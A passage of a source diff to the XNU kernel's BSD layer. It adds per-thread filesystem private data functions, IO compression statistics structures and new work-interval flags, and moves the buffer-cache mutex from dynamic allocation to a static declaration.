validation */ diff --git a/bsd/sys/ucred.h b/bsd/sys/ucred.h index 08be2fc3a..d1b3c1aaa 100644 --- a/bsd/sys/ucred.h +++ b/bsd/sys/ucred.h @@ -107,6 +107,9 @@ struct ucred { uid_t cr_ruid; /* real user id */ uid_t cr_svuid; /* saved user id */ u_short cr_ngroups; /* number of groups in advisory list */ +#if XNU_KERNEL_PRIVATE + u_short __cr_padding; +#endif gid_t cr_groups[NGROUPS];/* advisory group list */ gid_t cr_rgid; /* real group id */ gid_t cr_svgid; /* saved group id */ diff --git a/bsd/sys/unpcb.h b/bsd/sys/unpcb.h index 502aae89a..5867dcb2d 100644 --- a/bsd/sys/unpcb.h +++ b/bsd/sys/unpcb.h @@ -68,6 +68,9 @@ #include #include #include +#if !KERNEL && PRIVATE +#include +#endif /* * Protocol control block for an active @@ -204,7 +207,7 @@ struct xunpcb { u_quad_t xu_alignment_hack; 
}; -#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) +#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) struct xunpcb64_list_entry { u_int64_t le_next; @@ -238,7 +241,7 @@ struct xunpcb64 { struct xsocket64 xu_socket; }; -#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ +#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ #pragma pack() diff --git a/bsd/sys/user.h b/bsd/sys/user.h index 53fdcdb94..9a2934f4e 100644 --- a/bsd/sys/user.h +++ b/bsd/sys/user.h @@ -332,6 +332,9 @@ struct uthread { /* Document Tracking struct used to track a "tombstone" for a document */ struct doc_tombstone *t_tombstone; + /* Field to be used by filesystems */ + uint64_t t_fs_private; + struct os_reason *uu_exit_reason; }; diff --git a/bsd/sys/vnode.h b/bsd/sys/vnode.h index 0ae525055..aa0cd6aa4 100644 --- a/bsd/sys/vnode.h +++ b/bsd/sys/vnode.h @@ -70,7 +70,9 @@ #include #include #include -#endif +#else +#include +#endif /* KERNEL */ /* * The vnode is the focus of all file activity in UNIX. There is a @@ -1513,6 +1515,30 @@ int vfs_ctx_skipatime(vfs_context_t ctx); #endif +/* Supported filesystem tags for vfs_[set|get]_thread_fs_private */ +#define FS_PRIVATE_TAG_APFS (1) + +/*! + * @function vfs_set_thread_fs_private + * @abstract Set the per-thread filesystem private data field. + * @discussion Allows a filesystem to store an implementation specific value in the thread struct. + * Note that this field is common to all filesystems thus re-entrancy should be taken into consideration. + * @param tag Filesystem identification tag. + * @param fs_private The value to be set. + * @return 0 for success, ENOTSUP if the filesystem tag is not supported. + */ +int vfs_set_thread_fs_private(uint8_t tag, uint64_t fs_private); + +/*! + * @function vfs_get_thread_fs_private + * @abstract Return the per-thread filesystem private data field. 
+ * @discussion Returns the per-thread value that was set by vfs_set_thread_fs_private(). + * @param tag Filesystem identification tag. + * @param fs_private The stored per-thread value. + * @return 0 for success, ENOTSUP if the filesystem tag is not supported. + */ +int vfs_get_thread_fs_private(uint8_t tag, uint64_t *fs_private); + /*! * @function vflush * @abstract Reclaim the vnodes associated with a mount. @@ -2421,6 +2447,9 @@ vnode_t vfs_context_get_cwd(vfs_context_t); /* get cwd with iocount */ int vnode_isnoflush(vnode_t); void vnode_setnoflush(vnode_t); void vnode_clearnoflush(vnode_t); +#if CONFIG_IO_COMPRESSION_STATS +void vnode_iocs_record_and_free(vnode_t); +#endif /* CONFIG_IO_COMPRESSION_STATS */ #define BUILDPATH_NO_FS_ENTER 0x1 /* Use cache values, do not enter file system */ #define BUILDPATH_CHECKACCESS 0x2 /* Check if parents have search rights */ @@ -2439,4 +2468,34 @@ __END_DECLS #endif /* KERNEL */ +/* + * Structure for vnode level IO compression stats + */ + +#define IOCS_BUFFER_NUM_SIZE_BUCKETS 10 +#define IOCS_BUFFER_MAX_BUCKET 9 +#define IOCS_BUFFER_NUM_COMPRESSION_BUCKETS 7 +#define IOCS_BLOCK_NUM_SIZE_BUCKETS 16 + +struct io_compression_stats { + uint64_t uncompressed_size; + uint64_t compressed_size; + uint32_t buffer_size_compression_dist[IOCS_BUFFER_NUM_SIZE_BUCKETS][IOCS_BUFFER_NUM_COMPRESSION_BUCKETS]; + uint32_t block_compressed_size_dist[IOCS_BLOCK_NUM_SIZE_BUCKETS]; +}; +typedef struct io_compression_stats *io_compression_stats_t; + +#define IOCS_SBE_PATH_LEN 128 +#define IOCS_PATH_START_BYTES_TO_COPY 108 +#define IOCS_PATH_END_BYTES_TO_COPY 20 /* Includes null termination */ + +#define IOCS_SYSCTL_LIVE 0x00000001 +#define IOCS_SYSCTL_STORE_BUFFER_RD_ONLY 0x00000002 +#define IOCS_SYSCTL_STORE_BUFFER_MARK 0x00000004 + +struct iocs_store_buffer_entry { + char path_name[IOCS_SBE_PATH_LEN]; + struct io_compression_stats iocs; +}; + #endif /* !_VNODE_H_ */ diff --git a/bsd/sys/vnode_internal.h b/bsd/sys/vnode_internal.h index 
a25c11c3e..4af412789 100644 --- a/bsd/sys/vnode_internal.h +++ b/bsd/sys/vnode_internal.h @@ -121,7 +121,7 @@ typedef struct vnode_resolve *vnode_resolve_t; * v_freelist is locked by the global vnode_list_lock * v_mntvnodes is locked by the mount_lock * v_nclinks and v_ncchildren are protected by the global name_cache_lock - * v_cleanblkhd and v_dirtyblkhd and v_iterblkflags are locked via the global buf_mtxp + * v_cleanblkhd and v_dirtyblkhd and v_iterblkflags are locked via the global buf_mtx * the rest of the structure is protected by the vnode_lock */ struct vnode { @@ -184,6 +184,9 @@ struct vnode { * if VFLINKTARGET is set, if VFLINKTARGET is not * set, points to target */ #endif /* CONFIG_FIRMLINKS */ +#if CONFIG_IO_COMPRESSION_STATS + io_compression_stats_t io_compression_stats; /* IO compression statistics */ +#endif /* CONFIG_IO_COMPRESSION_STATS */ }; #define v_mountedhere v_un.vu_mountedhere @@ -621,6 +624,19 @@ int vnode_isinuse_locked(vnode_t, int, int ); #endif /* BSD_KERNEL_PRIVATE */ +#if CONFIG_IO_COMPRESSION_STATS +/* + * update the IO compression stats tracked at block granularity + */ +int vnode_updateiocompressionblockstats(vnode_t vp, uint32_t size_bucket); + +/* + * update the IO compression stats tracked for the buffer + */ +int vnode_updateiocompressionbufferstats(vnode_t vp, uint64_t uncompressed_size, uint64_t compressed_size, uint32_t size_bucket, uint32_t compression_bucket); + +#endif /* CONFIG_IO_COMPRESSION_STATS */ + extern bool rootvp_is_ssd; #endif /* !_SYS_VNODE_INTERNAL_H_ */ diff --git a/bsd/sys/vsock_domain.h b/bsd/sys/vsock_domain.h index 48049016f..c38709f5b 100644 --- a/bsd/sys/vsock_domain.h +++ b/bsd/sys/vsock_domain.h @@ -56,11 +56,8 @@ struct vsockpcb { struct vsockpcbinfo { // PCB locking. - lck_attr_t *vsock_lock_attr; - lck_grp_t *vsock_lock_grp; - lck_grp_attr_t *vsock_lock_grp_attr; - lck_rw_t *all_lock; - lck_rw_t *bound_lock; + lck_rw_t all_lock; + lck_rw_t bound_lock; // PCB lists. 
TAILQ_HEAD(, vsockpcb) all; LIST_HEAD(, vsockpcb) bound; diff --git a/bsd/sys/work_interval.h b/bsd/sys/work_interval.h index 91567cf83..b4d04f87b 100644 --- a/bsd/sys/work_interval.h +++ b/bsd/sys/work_interval.h @@ -154,6 +154,10 @@ __BEGIN_DECLS /* Kernel-supplied flag: Work interval has been ignored by the kernel */ #define WORK_INTERVAL_FLAG_IGNORED (0x20) +/* Specifies that the work interval requests the system to provide just enough performance + * to be able to finish at the provided deadline and no sooner. */ +#define WORK_INTERVAL_FLAG_FINISH_AT_DEADLINE (0x40) + /* Flags to describe the interval flavor to the performance controller */ #define WORK_INTERVAL_TYPE_MASK (0xF0000000) #define WORK_INTERVAL_TYPE_DEFAULT (0x0 << 28) @@ -163,6 +167,7 @@ __BEGIN_DECLS #define WORK_INTERVAL_TYPE_CA_CLIENT (0x3 << 28) #define WORK_INTERVAL_TYPE_HID_DELIVERY (0x4 << 28) #define WORK_INTERVAL_TYPE_COREMEDIA (0x5 << 28) +#define WORK_INTERVAL_TYPE_ARKIT (0x6 << 28) #define WORK_INTERVAL_TYPE_LAST (0xF << 28) #ifndef KERNEL diff --git a/bsd/sys_private/kdebug_private.h b/bsd/sys_private/kdebug_private.h index 6444ea6f4..bab6520e7 100644 --- a/bsd/sys_private/kdebug_private.h +++ b/bsd/sys_private/kdebug_private.h @@ -196,9 +196,11 @@ __API_AVAILABLE(macos(10.15), ios(13), tvos(13), watchos(6)); #define MACH_BRIDGE_OBSV_RATE 0x7 /* out of range observed rates */ /* DBG_SKYWALK has same toplevel code as DBG_DLIL, so don't reuse subcodes */ +#define DBG_SKYWALK_ALWAYSON 0x10 #define DBG_SKYWALK_FLOWSWITCH 0x11 #define DBG_SKYWALK_NETIF 0x12 #define DBG_SKYWALK_CHANNEL 0x13 +#define DBG_SKYWALK_PACKET 0x14 #define PPT_TEST 0x01 #define PPT_JETSAM_HIWAT 0x02 diff --git a/bsd/tests/bsd_tests.c b/bsd/tests/bsd_tests.c index debde98cf..cdb70d821 100644 --- a/bsd/tests/bsd_tests.c +++ b/bsd/tests/bsd_tests.c @@ -69,6 +69,7 @@ struct xnupost_test bsd_post_tests[] = { #ifdef __arm64__ XNUPOST_TEST_CONFIG_BASIC(arm64_lock_test), #endif +#if !KASAN // #if defined(__arm__) || 
defined(__arm64__) XNUPOST_TEST_CONFIG_BASIC(pmap_test), #endif /* defined(__arm__) || defined(__arm64__) */ @@ -78,12 +79,15 @@ struct xnupost_test bsd_post_tests[] = { #if __ARM_PAN_AVAILABLE__ XNUPOST_TEST_CONFIG_BASIC(arm64_late_pan_test), #endif +#endif /* !KASAN */ XNUPOST_TEST_CONFIG_BASIC(kalloc_test), XNUPOST_TEST_CONFIG_BASIC(ipi_test), #if HAS_TWO_STAGE_SPR_LOCK XNUPOST_TEST_CONFIG_BASIC(arm64_spr_lock_test), #endif +#if !KASAN XNUPOST_TEST_CONFIG_BASIC(copyio_test), +#endif /* !KASAN */ }; uint32_t bsd_post_tests_count = sizeof(bsd_post_tests) / sizeof(xnupost_test_data_t); diff --git a/bsd/vfs/kpi_vfs.c b/bsd/vfs/kpi_vfs.c index 0b4f7a628..3efc85736 100644 --- a/bsd/vfs/kpi_vfs.c +++ b/bsd/vfs/kpi_vfs.c @@ -145,7 +145,7 @@ static void xattrfile_setattr(vnode_t dvp, const char * basename, struct vnode_attr * vap, vfs_context_t ctx); #endif /* CONFIG_APPLEDOUBLE */ -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; static errno_t post_rename(vnode_t fdvp, vnode_t fvp, vnode_t tdvp, vnode_t tvp); @@ -1525,6 +1525,36 @@ vfs_context_bind(vfs_context_t ctx) return 0; } +int +vfs_set_thread_fs_private(uint8_t tag, uint64_t fs_private) +{ + struct uthread *ut; + + if (tag != FS_PRIVATE_TAG_APFS) { + return ENOTSUP; + } + + ut = get_bsdthread_info(current_thread()); + ut->t_fs_private = fs_private; + + return 0; +} + +int +vfs_get_thread_fs_private(uint8_t tag, uint64_t *fs_private) +{ + struct uthread *ut; + + if (tag != FS_PRIVATE_TAG_APFS) { + return ENOTSUP; + } + + ut = get_bsdthread_info(current_thread()); + *fs_private = ut->t_fs_private; + + return 0; +} + int vfs_isswapmount(mount_t mnt) { @@ -1567,9 +1597,9 @@ vfs_rootvnode(void) { int error; - lck_rw_lock_shared(rootvnode_rw_lock); + lck_rw_lock_shared(&rootvnode_rw_lock); error = vnode_get(rootvnode); - lck_rw_unlock_shared(rootvnode_rw_lock); + lck_rw_unlock_shared(&rootvnode_rw_lock); if (error) { return (vnode_t)0; } else { diff --git a/bsd/vfs/vfs_bio.c b/bsd/vfs/vfs_bio.c 
index 6f3b17ae6..b9bd4bb4c 100644 --- a/bsd/vfs/vfs_bio.c +++ b/bsd/vfs/vfs_bio.c @@ -167,12 +167,11 @@ static TAILQ_HEAD(bqueues, buf) bufqueues[BQUEUES]; static int needbuffer; static int need_iobuffer; -static lck_grp_t *buf_mtx_grp; -static lck_attr_t *buf_mtx_attr; -static lck_grp_attr_t *buf_mtx_grp_attr; -static lck_mtx_t *iobuffer_mtxp; -static lck_mtx_t *buf_mtxp; -static lck_mtx_t *buf_gc_callout; +static LCK_GRP_DECLARE(buf_mtx_grp, "buffer cache"); +static LCK_ATTR_DECLARE(buf_mtx_attr, 0, 0); +static LCK_MTX_DECLARE_ATTR(iobuffer_mtxp, &buf_mtx_grp, &buf_mtx_attr); +static LCK_MTX_DECLARE_ATTR(buf_mtx, &buf_mtx_grp, &buf_mtx_attr); +static LCK_MTX_DECLARE_ATTR(buf_gc_callout, &buf_mtx_grp, &buf_mtx_attr); static uint32_t buf_busycount; @@ -286,7 +285,7 @@ bremhash(buf_t bp) } /* - * buf_mtxp held. + * buf_mtx held. */ static __inline__ void bmovelaundry(buf_t bp) @@ -609,6 +608,21 @@ bufattr_ioscheduled(bufattr_t bap) return 0; } +void +bufattr_markexpeditedmeta(bufattr_t bap) +{ + SET(bap->ba_flags, BA_EXPEDITED_META_IO); +} + +int +bufattr_expeditedmeta(bufattr_t bap) +{ + if ((bap->ba_flags & BA_EXPEDITED_META_IO)) { + return 1; + } + return 0; +} + errno_t buf_error(buf_t bp) { @@ -896,7 +910,7 @@ buf_create_shadow_internal(buf_t bp, boolean_t force_copy, uintptr_t external_st } *(buf_t *)(&io_bp->b_orig) = bp; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); io_bp->b_lflags |= BL_SHADOW; io_bp->b_shadow = bp->b_shadow; @@ -910,7 +924,7 @@ buf_create_shadow_internal(buf_t bp, boolean_t force_copy, uintptr_t external_st bp->b_data_ref++; } #endif - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } else { if (external_storage) { #ifdef BUF_MAKE_PRIVATE @@ -956,7 +970,7 @@ buf_make_private(buf_t bp) bcopy((caddr_t)bp->b_datap, (caddr_t)my_buf.b_datap, bp->b_bcount); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); for (t_bp = bp->b_shadow; t_bp; t_bp = t_bp->b_shadow) { if (!ISSET(bp->b_lflags, BL_EXTERNAL)) { @@ -974,7 
+988,7 @@ buf_make_private(buf_t bp) } if (ds_bp == NULL) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); buf_free_meta_store(&my_buf); @@ -991,7 +1005,7 @@ buf_make_private(buf_t bp) bp->b_data_ref = 0; bp->b_datap = my_buf.b_datap; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); KERNEL_DEBUG(0xbbbbc004 | DBG_FUNC_END, bp, bp->b_shadow_ref, 0, 0, 0); return 0; @@ -1529,10 +1543,10 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg) } for (i = 0; i < num_lists; i++) { - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); if (buf_iterprepare(vp, &local_iterblkhd, list[i].flag)) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); continue; } while (!LIST_EMPTY(&local_iterblkhd)) { @@ -1548,7 +1562,7 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg) } } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); retval = callout(bp, arg); @@ -1564,17 +1578,17 @@ buf_iterate(vnode_t vp, int (*callout)(buf_t, void *), int flags, void *arg) if (bp) { buf_brelse(bp); } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); goto out; case BUF_CLAIMED_DONE: - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); goto out; } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); } /* while list has more nodes */ out: buf_itercomplete(vp, &local_iterblkhd, list[i].flag); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } /* for each list */ } /* buf_iterate */ @@ -1596,7 +1610,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) return 0; } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); for (;;) { if (must_rescan == 0) { @@ -1604,8 +1618,8 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) * the lists may not be empty, but all that's left at this * point are metadata or B_LOCKED buffers which are being * skipped... we know this because we made it through both - * the clean and dirty lists without dropping buf_mtxp... 
- * each time we drop buf_mtxp we bump "must_rescan" + * the clean and dirty lists without dropping buf_mtx... + * each time we drop buf_mtx we bump "must_rescan" */ break; } @@ -1642,7 +1656,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) if (error == EDEADLK) { /* * this buffer was marked B_LOCKED... - * we didn't drop buf_mtxp, so we + * we didn't drop buf_mtx, so we * we don't need to rescan */ continue; @@ -1650,7 +1664,7 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) if (error == EAGAIN) { /* * found a busy buffer... we blocked and - * dropped buf_mtxp, so we're going to + * dropped buf_mtx, so we're going to * need to rescan after this pass is completed */ must_rescan++; @@ -1662,10 +1676,10 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) */ buf_itercomplete(vp, &local_iterblkhd, VBI_CLEAN); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return error; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (bp->b_flags & B_LOCKED) { KERNEL_DEBUG(0xbbbbc038, bp, 0, 0, 0, 0); @@ -1675,10 +1689,10 @@ buf_invalidateblks(vnode_t vp, int flags, int slpflag, int slptimeo) SET(bp->b_flags, B_INVAL); buf_brelse(bp); - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); /* - * by dropping buf_mtxp, we allow new + * by dropping buf_mtx, we allow new * buffers to be added to the vnode list(s) * we'll have to rescan at least once more * if the queues aren't empty @@ -1717,7 +1731,7 @@ try_dirty_list: if (error == EDEADLK) { /* * this buffer was marked B_LOCKED... - * we didn't drop buf_mtxp, so we + * we didn't drop buf_mtx, so we * we don't need to rescan */ continue; @@ -1725,7 +1739,7 @@ try_dirty_list: if (error == EAGAIN) { /* * found a busy buffer... 
we blocked and - * dropped buf_mtxp, so we're going to + * dropped buf_mtx, so we're going to * need to rescan after this pass is completed */ must_rescan++; @@ -1737,10 +1751,10 @@ try_dirty_list: */ buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return error; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (bp->b_flags & B_LOCKED) { KERNEL_DEBUG(0xbbbbc038, bp, 0, 0, 1, 0); @@ -1755,9 +1769,9 @@ try_dirty_list: buf_brelse(bp); } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); /* - * by dropping buf_mtxp, we allow new + * by dropping buf_mtx, we allow new * buffers to be added to the vnode list(s) * we'll have to rescan at least once more * if the queues aren't empty @@ -1766,7 +1780,7 @@ try_dirty_list: } buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY); } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return 0; } @@ -1796,7 +1810,7 @@ buf_flushdirtyblks_skipinfo(vnode_t vp, int wait, int flags, const char *msg) lock_flags |= BAC_SKIP_NONLOCKED; } loop: - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); if (buf_iterprepare(vp, &local_iterblkhd, VBI_DIRTY) == 0) { while (!LIST_EMPTY(&local_iterblkhd)) { @@ -1823,7 +1837,7 @@ loop: } continue; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); bp->b_flags &= ~B_LOCKED; @@ -1838,11 +1852,11 @@ loop: } writes_issued++; - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); } buf_itercomplete(vp, &local_iterblkhd, VBI_DIRTY); } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (wait) { (void)vnode_waitforwrites(vp, 0, 0, 0, msg); @@ -1875,7 +1889,7 @@ loop: /* - * called with buf_mtxp held... + * called with buf_mtx held... 
* this lock protects the queue manipulation */ static int @@ -1891,7 +1905,7 @@ buf_iterprepare(vnode_t vp, struct buflists *iterheadp, int flags) while (vp->v_iterblkflags & VBI_ITER) { vp->v_iterblkflags |= VBI_ITERWANT; - msleep(&vp->v_iterblkflags, buf_mtxp, 0, "buf_iterprepare", NULL); + msleep(&vp->v_iterblkflags, &buf_mtx, 0, "buf_iterprepare", NULL); } if (LIST_EMPTY(listheadp)) { LIST_INIT(iterheadp); @@ -1907,7 +1921,7 @@ buf_iterprepare(vnode_t vp, struct buflists *iterheadp, int flags) } /* - * called with buf_mtxp held... + * called with buf_mtx held... * this lock protects the queue manipulation */ static void @@ -1982,7 +1996,7 @@ bremfree_locked(buf_t bp) /* * Associate a buffer with a vnode. - * buf_mtxp must be locked on entry + * buf_mtx must be locked on entry */ static void bgetvp_locked(vnode_t vp, buf_t bp) @@ -2004,7 +2018,7 @@ bgetvp_locked(vnode_t vp, buf_t bp) /* * Disassociate a buffer from a vnode. - * buf_mtxp must be locked on entry + * buf_mtx must be locked on entry */ static void brelvp_locked(buf_t bp) @@ -2033,7 +2047,7 @@ buf_reassign(buf_t bp, vnode_t newvp) printf("buf_reassign: NULL"); return; } - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); /* * Delete from old vnode list, if on one. 
@@ -2052,7 +2066,7 @@ buf_reassign(buf_t bp, vnode_t newvp) } bufinsvn(bp, listheadp); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } static __inline__ void @@ -2112,36 +2126,6 @@ bufinit(void) binsheadfree(bp, &iobufqueue, -1); } - /* - * allocate lock group attribute and group - */ - buf_mtx_grp_attr = lck_grp_attr_alloc_init(); - buf_mtx_grp = lck_grp_alloc_init("buffer cache", buf_mtx_grp_attr); - - /* - * allocate the lock attribute - */ - buf_mtx_attr = lck_attr_alloc_init(); - - /* - * allocate and initialize mutex's for the buffer and iobuffer pools - */ - buf_mtxp = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr); - iobuffer_mtxp = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr); - buf_gc_callout = lck_mtx_alloc_init(buf_mtx_grp, buf_mtx_attr); - - if (iobuffer_mtxp == NULL) { - panic("couldn't create iobuffer mutex"); - } - - if (buf_mtxp == NULL) { - panic("couldn't create buf mutex"); - } - - if (buf_gc_callout == NULL) { - panic("couldn't create buf_gc_callout mutex"); - } - /* * allocate and initialize cluster specific global locks... 
*/ @@ -2540,7 +2524,7 @@ buf_brelse_shadow(buf_t bp) #endif int need_wakeup = 0; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); __IGNORE_WCASTALIGN(bp_head = (buf_t)bp->b_orig); @@ -2619,7 +2603,7 @@ buf_brelse_shadow(buf_t bp) need_wakeup = 1; } } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (need_wakeup) { wakeup(bp_head); @@ -2809,21 +2793,21 @@ buf_brelse(buf_t bp) */ buf_release_credentials(bp); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (bp->b_shadow_ref) { SET(bp->b_lflags, BL_WAITSHADOW); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return; } if (delayed_buf_free_meta_store == TRUE) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); finish_shadow_master: buf_free_meta_store(bp); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); } CLR(bp->b_flags, (B_META | B_ZALLOC | B_DELWRI | B_LOCKED | B_AGE | B_ASYNC | B_NOCACHE | B_FUA)); @@ -2855,12 +2839,12 @@ finish_shadow_master: bp->b_timestamp = buf_timestamp(); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); /* * the buf_brelse_shadow routine doesn't take 'ownership' * of the parent buf_t... it updates state that is protected by - * the buf_mtxp, and checks for BL_BUSY to determine whether to + * the buf_mtx, and checks for BL_BUSY to determine whether to * put the buf_t back on a free list. 
b_shadow_ref is protected * by the lock, and since we have not yet cleared B_BUSY, we need * to check it while holding the lock to insure that one of us @@ -2883,9 +2867,9 @@ finish_shadow_master: if (needbuffer) { /* * needbuffer is a global - * we're currently using buf_mtxp to protect it + * we're currently using buf_mtx to protect it * delay doing the actual wakeup until after - * we drop buf_mtxp + * we drop buf_mtx */ needbuffer = 0; need_wakeup = 1; @@ -2893,7 +2877,7 @@ finish_shadow_master: if (ISSET(bp->b_lflags, BL_WANTED)) { /* * delay the actual wakeup until after we - * clear BL_BUSY and we've dropped buf_mtxp + * clear BL_BUSY and we've dropped buf_mtx */ need_bp_wakeup = 1; } @@ -2903,7 +2887,7 @@ finish_shadow_master: CLR(bp->b_lflags, (BL_BUSY | BL_WANTED)); buf_busycount--; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (need_wakeup) { /* @@ -2936,14 +2920,14 @@ incore(vnode_t vp, daddr64_t blkno) dp = BUFHASH(vp, blkno); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if (incore_locked(vp, blkno, dp)) { retval = TRUE; } else { retval = FALSE; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return retval; } @@ -2973,7 +2957,7 @@ buf_wait_for_shadow_io(vnode_t vp, daddr64_t blkno) dp = BUFHASH(vp, blkno); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); for (;;) { if ((bp = incore_locked(vp, blkno, dp)) == NULL) { @@ -2986,9 +2970,9 @@ buf_wait_for_shadow_io(vnode_t vp, daddr64_t blkno) SET(bp->b_lflags, BL_WANTED_REF); - (void) msleep(bp, buf_mtxp, PSPIN | (PRIBIO + 1), "buf_wait_for_shadow", NULL); + (void) msleep(bp, &buf_mtx, PSPIN | (PRIBIO + 1), "buf_wait_for_shadow", NULL); } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } /* XXX FIXME -- Update the comment to reflect the UBC changes (please) -- */ @@ -3020,7 +3004,7 @@ buf_getblk(vnode_t vp, daddr64_t blkno, int size, int slpflag, int slptimeo, int operation &= ~BLK_ONLYVALID; dp = BUFHASH(vp, blkno); start: - 
lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); if ((bp = incore_locked(vp, blkno, dp))) { /* @@ -3047,7 +3031,7 @@ start: KERNEL_DEBUG((FSDBG_CODE(DBG_FSRW, 396)) | DBG_FUNC_NONE, (uintptr_t)blkno, size, operation, 0, 0); - err = msleep(bp, buf_mtxp, slpflag | PDROP | (PRIBIO + 1), "buf_getblk", &ts); + err = msleep(bp, &buf_mtx, slpflag | PDROP | (PRIBIO + 1), "buf_getblk", &ts); /* * Callers who call with PCATCH or timeout are @@ -3080,7 +3064,7 @@ start: bremfree_locked(bp); bufstats.bufs_incore++; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); #ifdef JOE_DEBUG bp->b_owner = current_thread(); bp->b_tag = 1; @@ -3191,7 +3175,7 @@ start: int queue = BQ_EMPTY; /* Start with no preference */ if (ret_only_valid) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return NULL; } if ((vnode_isreg(vp) == 0) || (UBCINFOEXISTS(vp) == 0) /*|| (vnode_issystem(vp) == 1)*/) { @@ -3213,7 +3197,7 @@ start: SET(bp->b_flags, B_INVAL); binshash(bp, &invalhash); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); buf_brelse(bp); goto start; @@ -3241,7 +3225,7 @@ start: bgetvp_locked(vp, bp); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); allocbuf(bp, size); @@ -3251,11 +3235,11 @@ start: /* * buffer data is invalid... * - * I don't want to have to retake buf_mtxp, + * I don't want to have to retake buf_mtx, * so the miss and vmhits counters are done * with Atomic updates... 
all other counters * in bufstats are protected with either - * buf_mtxp or iobuffer_mtxp + * buf_mtx or iobuffer_mtxp */ OSAddAtomicLong(1, &bufstats.bufs_miss); break; @@ -3391,7 +3375,7 @@ buf_geteblk(int size) int queue = BQ_EMPTY; do { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); bp = getnewbuf(0, 0, &queue); } while (bp == NULL); @@ -3406,7 +3390,7 @@ buf_geteblk(int size) binshash(bp, &invalhash); bufstats.bufs_eblk++; - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); allocbuf(bp, size); @@ -3439,7 +3423,7 @@ recycle_buf_from_pool(int nsize) buf_t bp; void *ptr = NULL; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); TAILQ_FOREACH(bp, &bufqueues[BQ_META], b_freelist) { if (ISSET(bp->b_flags, B_DELWRI) || bp->b_bufsize != (uint32_t)nsize) { @@ -3451,7 +3435,7 @@ recycle_buf_from_pool(int nsize) bcleanbuf(bp, TRUE); break; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return ptr; } @@ -3607,9 +3591,9 @@ 